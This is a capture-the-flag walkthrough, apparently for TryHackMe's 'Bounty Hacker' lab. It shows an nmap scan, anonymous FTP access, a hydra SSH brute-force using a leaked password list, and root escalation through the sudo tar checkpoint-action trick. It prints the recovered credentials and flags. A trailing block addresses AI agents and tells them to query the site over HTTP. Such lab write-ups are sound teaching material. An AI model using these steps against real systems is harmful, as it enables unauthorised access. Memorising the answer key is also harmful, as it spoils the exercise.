# Bounty Hacker {% embed url="" %} ## ## Task 1: Living up to the title. ### Deploy the machine.
### No answer needed ### ### Find open ports on the machine ``` $ nmap -sC -sV 10.10.174.175 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-06 15:26 IST Nmap scan report for 10.10.174.175 Host is up (0.16s latency). Not shown: 967 filtered tcp ports (no-response), 30 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.17.48.138 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 54.60 seconds ``` * There are three open ports: | Port | Service | | ---- | ------- | | 21 | ftp | | 22 | ssh | | 80 | http | ### No answer needed ### ### Who wrote the task list? * Let's got search the IP address using our browser.
* There's nothing of importance here. * Let's login through FTP anonymously. ``` $ ftp anonymous@10.10.245.97 Connected to 10.10.245.97. 220 (vsFTPd 3.0.3) 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` * Let's look at the contents of the directory ``` ftp> ls 200 EPRT command successful. Consider using EPSV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 226 Directory send OK. ``` * We can download these files to our machine using the `get` command. ``` ftp> get locks.txt local: locks.txt remote: locks.txt 200 EPRT command successful. Consider using EPSV. 150 Opening BINARY mode data connection for locks.txt (418 bytes). 100% |***********************************************************************************************************************************************************************************************| 418 13.18 KiB/s 00:00 ETA 226 Transfer complete. 418 bytes received in 00:00 (2.17 KiB/s) ftp> get task.txt local: task.txt remote: task.txt 200 EPRT command successful. Consider using EPSV. 150 Opening BINARY mode data connection for task.txt (68 bytes). 100% |***********************************************************************************************************************************************************************************************| 68 328.74 KiB/s 00:00 ETA 226 Transfer complete. 68 bytes received in 00:00 (0.37 KiB/s) ``` * Let's read the `task.txt` file. ``` $ cat task.txt 1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin ``` ### Answer ``` lin ``` ### ### What service can you bruteforce with the text file found? * Since we saw that FTP, SSH and HTTP were the services running on the machine it is safe to saw that we can brute force SSH. ### Answer ``` SSH ``` ### ### What is the users password? * Let's take a look at the `locks.txt` file ``` $ cat locks.txt rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ReddRA60N R3dDrag0nSynd1c4te dRa6oN5YNDiCATE ReDDR4g0n5ynDIc4te R3Dr4gOn2044 RedDr4gonSynd1cat3 R3dDRaG0Nsynd1c@T3 Synd1c4teDr@g0n reddRAg0N REddRaG0N5yNdIc47e Dra6oN$yndIC@t3 4L1mi6H71StHeB357 rEDdragOn$ynd1c473 DrAgoN5ynD1cATE ReDdrag0n$ynd1cate Dr@gOn$yND1C4Te RedDr@gonSyn9ic47e REd$yNdIc47e dr@goN5YNd1c@73 rEDdrAGOnSyNDiCat3 r3ddr@g0N ReDSynd1ca7e ``` * Seems to be a bunch of passwords. * We can brute force SSH using the `hydra` utility. ``` $ hydra -l lin -P locks.txt 10.10.245.97 ssh Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-06 16:48:07 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task [DATA] attacking ssh://10.10.245.97:22/ [22][ssh] host: 10.10.245.97 login: lin password: RedDr4gonSynd1cat3 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 1 final worker threads did not complete until end. [ERROR] 1 target did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-06 16:48:12 ``` * So the password for the `lin` user is `RedDr4gonSynd1cat3`. ### Answer ``` RedDr4gonSynd1cat3 ``` ### ### user.txt * Let's login using the credentials we have. ``` $ ssh lin@10.10.245.97 The authenticity of host '10.10.245.97 (10.10.245.97)' can't be established. ED25519 key fingerprint is SHA256:Y140oz+ukdhfyG8/c5KvqKdvm+Kl+gLSvokSys7SgPU. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.245.97' (ED25519) to the list of known hosts. lin@10.10.245.97's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 83 packages can be updated. 0 updates are security updates. Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14 lin@bountyhacker:~/Desktop$ ``` * After lookin around we can see a `user.txt` file. Let's `cat` that file. ``` lin@bountyhacker:~/Desktop$ cat user.txt THM{CR1M3_SyNd1C4T3} ``` ### Answer ``` THM{CR1M3_SyNd1C4T3} ``` ### ### root.txt * We can list out the `sudo` commands that the `lin` user is able to run using the following command: ``` lin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar ``` * We can now use GTFOBins to escalate our privilege.
* We will use the `Sudo` exploit. ``` lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names # ``` * We now have root privilege and can cat the `root.txt` file. ``` # cat root.txt THM{80UN7Y_h4cK3r} ``` ### Answer ``` THM{80UN7Y_h4cK3r} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/bounty-hacker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.